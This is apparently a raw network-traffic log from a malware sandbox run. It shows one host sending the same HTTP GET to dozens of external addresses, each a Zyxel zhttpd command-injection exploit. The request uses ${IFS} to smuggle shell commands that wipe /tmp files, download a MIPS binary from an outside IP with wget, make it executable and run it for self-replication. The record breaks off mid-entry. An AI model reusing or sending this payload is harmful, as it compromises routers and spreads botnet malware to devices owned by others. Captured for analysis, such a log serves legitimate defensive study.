                                                Jan 12, 2024 18:24:22.520814896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1085192.168.2.1355714203.82.217.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520895004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1086192.168.2.135505618.151.233.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520895004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1087192.168.2.1355210199.80.252.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520926952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1088192.168.2.1351176174.124.170.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520991087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1089192.168.2.1358256118.112.88.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521020889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1090192.168.2.1353498150.115.103.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521061897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1091192.168.2.1343066195.161.220.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521117926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1092192.168.2.1360812114.192.89.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521150112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1093192.168.2.134067475.231.118.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521183014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1094192.168.2.1339024158.192.172.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521214008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1095192.168.2.135516025.18.149.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521234989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1096192.168.2.1345122101.40.99.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521302938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1097192.168.2.1333526138.19.66.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521332979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1098192.168.2.1345990139.102.179.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521380901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1099192.168.2.1345594209.71.122.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521466970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1100192.168.2.1360216218.53.38.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521467924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1101192.168.2.1344534163.214.76.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521472931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1102192.168.2.1335604199.159.131.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521472931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1103192.168.2.1352770205.177.135.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521501064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1104192.168.2.1350136196.233.105.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521553993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1105192.168.2.134670031.236.15.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521601915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1106192.168.2.13399665.154.178.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521625996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1107192.168.2.1356238101.61.168.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521688938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1108192.168.2.1337870174.19.44.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521747112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1109192.168.2.135667637.95.135.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521823883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1110192.168.2.1340366149.180.204.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521857977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1111192.168.2.1343332212.182.208.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.521914959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1112192.168.2.1358402113.78.194.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522037983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1113192.168.2.1334358160.219.45.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522059917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1114192.168.2.1344358137.66.206.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522066116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1115192.168.2.135953675.221.245.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522066116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1116192.168.2.1336116161.128.111.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522068024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1117192.168.2.1345466124.212.80.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522068024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1118192.168.2.134112658.98.80.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522116899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1119192.168.2.1355722138.254.43.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522130013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1120192.168.2.1353782160.77.183.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522182941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1121192.168.2.1339288192.166.170.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522236109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1122192.168.2.133652057.7.22.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522285938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1123192.168.2.134671245.154.254.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522320986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1124192.168.2.1356448103.137.201.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522368908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1125192.168.2.1343646181.209.203.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522394896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1126192.168.2.1353914170.75.182.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522454023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1127192.168.2.1360820131.179.0.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522484064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1128192.168.2.1344308152.148.18.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522537947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1129192.168.2.1340438149.162.208.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522572994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1130192.168.2.135270852.49.193.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522628069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1131192.168.2.1360542194.138.27.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522661924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1132192.168.2.1337724180.145.142.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522715092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1133192.168.2.1341302114.197.31.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522721052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1134192.168.2.1359178211.111.171.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522826910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1135192.168.2.1345348124.185.87.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522854090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1136192.168.2.1336414209.138.44.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522872925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1137192.168.2.1349192200.45.79.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522912025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1138192.168.2.1343552178.252.99.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522929907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1139192.168.2.134712060.209.96.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.522980928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1140192.168.2.1340428138.0.76.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523015022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1141192.168.2.135490020.178.2.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523063898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1142192.168.2.1360690206.7.184.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523093939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1143192.168.2.1337148145.138.251.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523140907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1144192.168.2.136099254.170.6.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523190975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1145192.168.2.135846652.36.250.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523336887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1146192.168.2.134481612.182.168.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523338079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1147192.168.2.1354042182.111.6.172443
                                                TimestampBytes transferredDirectionData
